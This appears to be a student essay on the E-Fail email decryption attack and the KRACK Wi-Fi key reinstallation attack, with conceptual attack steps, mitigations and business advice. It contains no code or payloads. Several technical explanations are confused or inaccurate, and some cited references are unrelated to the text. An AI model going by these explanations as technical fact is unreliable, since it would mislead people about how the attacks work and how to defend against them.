Cryptography and data security
1. Research each attack and explain the cryptographic weaknesses that make the attack possible, and explain how the attack is performed.
Cryptography is a method to protect and securely send the data to the receiver. It protects the data like communication between two systems, its secure online transactions by using the codes so that only the receiver can understand or encrypt. Crypt means “hidden” and graphic stands for “writing”.
E-Fail Attack:
E-Fail is an attack which targets the encrypted emails and this can be done by changing or formatting the encrypted standards or by specific vulnerable clients.
It is a Security hole present in the emails. Most of them use the HTML or JavaScript, so it is easy for the attacker to attack the content of the email. The encrypted form transmits the content.Mostly affect the Gmail, Microsoft outlook and Apple mails.
E-Fail mostly attacks the vulnerabilities in OpenPGP and S/MIME standards to show the plaintext of encrypted emails. (Nikiforakis el-al,2019).
In an email, an attacker needs access to the message which is present in the email which is in encrypted form and ability to send the email to at least one of its regular recipients of the original mail.
The attack is performed in two ways:
Direct Filtration –
To access the decrypted content of the encrypted mail, the attacker modifies the message in a particular way or a specific way and then send the changed email to the recipients. To create the MIME, the attacker adds the additional part before and after the encrypted text of the encrypted mail as a parameter value of the HTML tag.
Here, the attacker create 3 multiple body parts:
First is IMG tag, in this tag the link is open with quotes but not closed.
The second part is s/MIME Ciphertext, and the third part contains the body HTML, which closes the img tag of the first part.
Now, the recipient receives this in :
In an email, all the non-printable are written in %20 which is whitespace and request it from the img tag which contains plaintext. Thus the attacker receives the plaintext from the victim’s client
CBC/CFB Attack:
In this attack, it exfilters the plaintext using the CBC/CFB gadgets.
In CBC mode, if the attacker knows the plaintext, it can modify plaintext blocks. It is used in S/MIME, and CFB is used in OpenPGP, which is very similar to CBC properties. In this attack, the attacker already knows the first block. Then she tries for other blocks by injecting the img tag in the encrypted plaintext. (Poddebniak and Dresen, 2018)
The weakness of the attack:
- Use of end to end email encryption with PGP or S/MIME
- Attacker already has information about the encrypted messages.
- The victim is at risk, and it processes the encrypted email messages and renter HTML.
KRACK Attack :
Depending upon the configuration of the network, it is possible to inject the data and manipulate it in some code language. Example attacker can inject the websites by adding different types of malware activities.
Krack stands for Key reinstallation Attack. It is responsible for stealing the data which is transmitted over the network which uses Wi-Fi’s WPA security protocol. The data which is very sensitive like login credentials, credit card details, private chats or any kind of data which victim transmit over the web. It includes man-in-the-middle attacks to hack the website or inject any kind of code on the website.
Method:
The encrypted WPA which is secure encryption used to protect the communication of a user’s device and the device which is providing Wi-Fi, so the WPA uses four-way handshake sequence. However, for retransmission, only the third part of the four-way handshake is required. When the victim reconnects to the already used Wi-Fi network, it resends them the third part of the handshake sequence, and the encryption key can send multiple times during the third step. If the attacker makes a count on it and revises all the retransmissions, then the encryption can be broken.
Each time the victim sends the request over the Wi-Fi for re-connection, the attacker tries to resend the third part of handshake to the victim’s device, once victim accepted the request, and then the decryption is started. (Chacos and Simon, 2017)
Now the victim is in the loophole of the attacker, and now the attacker has all the track of information passing over the network within the same range.
The condition for attacking is that both should be connected to the same Wi-Fi network.
The weakness of the process:
- Not using the standard HTTPS security for protection.
- Antivirus software’s are not updated on computers.
- Use of same encryption key for protection which is already being used in past.
- The problem in WIFI standards.
- Explain what can be done with the E-FAIL and KRACK attacks? What do each of them allow an attacker to do, and what kind of access does the attacker need?
E-Fail Attack :
There are two types of ways to avoid this attack:
- Short term :
Disable Html rendering, and mostly the attack has been made in img tag, styles, so by disabling the presentation of HTML tags or forms in the mail will reduce the risk of the attack.
Any URL in decrypted form now appear as text, now there will be a button so to toggle that and if nothing is wrong that it will open and can read the email safely.]
- Long term :
No decryption in the email client, the best way to avoid the attack is to decrypt email MIME or PGP in another app which is outside of the email client. Remove the MIME or PGP secret keys from the email client, then open the incoming encrypted email, copy and paste the ciphertext into another app which done the decryption. It will prevent the exfiltration channels of email clients.
The attacker needs access to the S/MIME or PGP emails but sent over an HTTP connection or a compromised email server then only this attack can be possible. After knowing the encrypted email, the attacker can add the extra attributes in the tags, which is received by the victim’s client.
KRACK Attack :
If the attacker has access over the Wi-Fi, then it can steal all the private information, sensitive data, credit card details or anything which is transferred over the network.
An attacker within the Wi-Fi range captures the secret key, and force the victim to connect to the network which the attacker has created. Once the victim accepts that, then attacker know can encrypt its security related to any of the credentials.
An attacker can intercept between the traffic of the device and the router through which information is exchanged, but if traffic is encrypted by https, then the attacker cannot look into the traffic. By this attacker does not have access to WIFI password but it can make changes in the traffic which is unencrypted. With some help of tools, it can inject some packets which can be harmful to the device.
Example:
If anyone is using IoT devices, then KRACK attack is a significant concern for them. If they have installed a connected security camera is in their house, which does not encrypt traffic when connected to a same WIFI network, an attacker can snoop on raw video footage of the house which is very risky.
Best ways to avoid the attack is:
- Do not use public hotspots even if they are password-protected at the coffee shop or airport.
- Do not use the same secret key over and over again, makes changes in the secret key.
- Try to use Encrypted traffic solutions like HTTPS.
- Update all WIFI devices and routers with the latest security patches.
- Assume you have been asked by a business to assess the risks these attacks pose to
them. Write some advice for the business. Can the business know if the attacks were
used against them? State what the impact of the attacks might have been and what the
The business should do.
E-Fail Attack:
A real estate company was worried about the attacks going all around. He has heard about the issue of the hijack of email or data manipulation in the emails.
So his business can get attack by this as :
His email can get attack by the E-fail. As he sends email regarding the location of the building to the client every time. He is even not using or does not know anything about the attack. So explained the scenario if he gets attacked, then what will be the risks attached to it.
The server he was using was not at all protected and was using HTTP not https network. So he can easily get attacked by the attacker. Every time he can lose one client as a client can receive the wrong address in an email or can get an error while opening the image, by this client will get lose interest in his property.
Advice for the business:
- The business should use the https network.
- Disable all its Html rendering as the attacker can use img tag to send wrong output to the victim’s client.
- It should arrange for more secure end to end channel .such as temporarily should stop sending encrypted emails, especially PGP encrypted one.
Attacker advantages:
- He can send his address in place victim’s address He can steal his customer for the benefit of his own
- He can access the encrypted mails of the victim, so he has a track of his all private conversation done via mail.
- He can misguide all the customer’s victim has via mail.
Krack Attack:
A client who has Business of real state can get suffer from the Krack attack as the victim has started his new business and created a portal for all the customers to visit the website and register to get bonus points and put referral codes for the customers.
The client travels most of the time for a business meeting, and he also connects his laptop to airport Free WIFI hotspot, He never takes cares of any kind of messages prompts up when connecting to network.
The risk his business can face is
- If the Attacker took him into his loop whole while connecting to Wi-Fi at the time of the airport, then the attacker will have all the details of login credentials.
- An attacker can get access to all his credit card details if they are save in the browser.
- An attacker can attack the portal can damage the things in seconds.
Advice for the protection of his business:
- Every time log into a website, make sure the connection is encrypted.
- Also, make sure connection stays encrypted for all other online credentials also
- To encrypt web browsing make sure to use a virtual private network
References
- Jose, T. T. Tomy, V. Karunakaran, Anjali Krishna V, A. Varkey and Nisha C.A., “Securing passwords from dictionary attack with character-tree,” 2016 International Conference on Wireless Communications, Signal Processing and Networking (WiSPNET), Chennai, 2016, pp. 2301-2307.
Rehman, I. (2018). What Is A Brute Force Attack?. [online] The Official Cloudways Blog. Available at: https://www.cloudways.com/blog/what-is-brute-force-attack/
Johns, M., Nikiforakis, N., Volkamer, M., & Wilander, J. (2019). Web Application Security (Dagstuhl Seminar 18321). Schloss Dagstuhl-Leibniz-Zentrum fuer Informatik.
Poddebniak, D. and Dresen, C. (2018). [online] Usenix.org. Available at: https://www.usenix.org/system/files/conference/usenixsecurity18/sec18-poddebniak.pdf.
Chacos, B. and Simon, M. (2017). KRACK Wi-Fi attack threatens all networks: How to stay safe and what you need to know. [online] PCWorld. Available at: https://www.pcworld.com/article/3233308/krack-wi-fi-security-flaw-faq-tips.html.